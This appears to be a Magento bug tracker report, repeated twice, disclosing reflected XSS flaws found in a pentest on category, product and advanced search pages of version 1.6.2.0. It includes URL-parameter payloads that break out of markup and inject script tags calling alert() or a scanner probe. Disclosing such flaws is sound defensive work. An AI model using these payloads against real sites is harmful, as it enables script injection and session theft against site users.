Posted: 2012-12-18 03:39:20
Category: Categories
Version: 1.6.2.0
Priority: high
Status: closed
Reported By: kay
last week we start an pentest over our magento installation and we found on every category and detail page XSS problems.
Example:
<a href="?id=37&'"--></style></script><script>netsparker(0x000311)</script>=&order=price&dir=asc">
OR
in URL: ?nsextt='"--></style></script><script>alert(0x000379)</script>
SEARCH have this problem too:
catalogsearch/advanced/result/?cat=3&description=3&name='"--></style></script><script>alert(0x000700)</script>&price[from]=&price[to]=&search=3&short_description=3&sku=3&price[from]=3&price[to]=3
and some form elements have not autocomplete="off", maybe this can be a problem too.
best regards,
kay
Category: Categories
Version: 1.6.2.0
Priority: high
Status: closed
Reported By: kay
last week we start an pentest over our magento installation and we found on every category and detail page XSS problems.
Example:
<a href="?id=37&'"--></style></script><script>netsparker(0x000311)</script>=&order=price&dir=asc">
OR
in URL: ?nsextt='"--></style></script><script>alert(0x000379)</script>
SEARCH have this problem too:
catalogsearch/advanced/result/?cat=3&description=3&name='"--></style></script><script>alert(0x000700)</script>&price[from]=&price[to]=&search=3&short_description=3&sku=3&price[from]=3&price[to]=3
and some form elements have not autocomplete="off", maybe this can be a problem too.
best regards,
kay
